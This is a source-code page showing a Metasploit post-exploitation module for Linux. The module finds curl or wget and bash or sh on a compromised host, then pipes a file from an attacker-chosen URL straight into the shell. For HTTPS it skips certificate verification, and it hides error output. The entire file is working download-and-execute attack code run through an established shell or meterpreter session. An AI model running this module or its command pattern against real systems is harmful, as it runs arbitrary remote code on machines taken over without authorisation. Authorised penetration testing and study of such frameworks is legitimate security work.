Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/manage/download_exec.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Post::File
8
include Msf::Post::Linux::System
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Linux Manage Download and Execute',
15
'Description' => %q{
16
This module downloads and runs a file with bash. It first tries to use curl as
17
its HTTP client and then wget if it's not found. Bash found in the PATH is used
18
to execute the file.
19
},
20
'License' => MSF_LICENSE,
21
'Author' => [
22
'Joshua D. Abraham <jabra[at]praetorian.com>',
23
],
24
'Platform' => ['linux'],
25
'SessionTypes' => ['shell', 'meterpreter'],
26
'Notes' => {
27
'Stability' => [CRASH_SAFE],
28
'Reliability' => [],
29
'SideEffects' => [ARTIFACTS_ON_DISK]
30
}
31
)
32
)
33
34
register_options(
35
[
36
OptString.new('URL', [true, 'Full URL of file to download.'])
37
]
38
)
39
end
40
41
def cmd_exec_vprint(cmd)
42
vprint_status("Executing: #{cmd}")
43
output = cmd_exec(cmd)
44
if !output.empty?
45
vprint_status(output.to_s)
46
end
47
end
48
49
def exists_exe?(exe)
50
vprint_status "Searching for #{exe} in the current $PATH..."
51
path = get_env('PATH')
52
if path.nil? || path.empty?
53
vprint_error('No local $PATH set!')
54
return false
55
end
56
57
vprint_status("$PATH is #{path.strip!}")
58
59
path.split(':').each do |p|
60
full_path = p + '/' + exe
61
vprint_status "Searching for '#{full_path}' ..."
62
return true if file_exist?(full_path)
63
end
64
65
return false
66
end
67
68
def search_http_client
69
print_status('Checking if curl exists in the path...')
70
if exists_exe?('curl')
71
print_good('curl available, using it')
72
@stdout_option = ''
73
@http_client = 'curl'
74
@ssl_option = '-k'
75
return
76
end
77
78
print_status('Checking if wget exists in the path...')
79
if exists_exe?('wget')
80
print_good('wget available, using it')
81
@http_client = 'wget'
82
@stdout_option = '-O-'
83
@ssl_option = '--no-check-certificate'
84
return
85
end
86
end
87
88
def search_shell
89
print_status('Checking if bash exists in the path...')
90
if exists_exe?('bash')
91
print_good('bash available, using it')
92
@shell = 'bash'
93
return
94
end
95
96
print_status('Checking if sh exists in the path...')
97
if exists_exe?('sh')
98
print_good('sh available, using it')
99
@shell = 'sh'
100
return
101
end
102
end
103
104
def run
105
search_http_client
106
107
if !@http_client
108
print_warning('neither curl nor wget available in the $PATH, aborting...')
109
return
110
end
111
112
search_shell
113
114
if !@shell
115
print_warning('neither bash nor sh available in the $PATH, aborting...')
116
return
117
end
118
119
if datastore['URL'].match(%r{^https://})
120
cmd_exec_vprint("#{@http_client} #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | #{@shell}")
121
else
122
cmd_exec_vprint("#{@http_client} #{@stdout_option} #{datastore['URL']} 2>/dev/null | #{@shell}")
123
end
124
end
125
end
126
127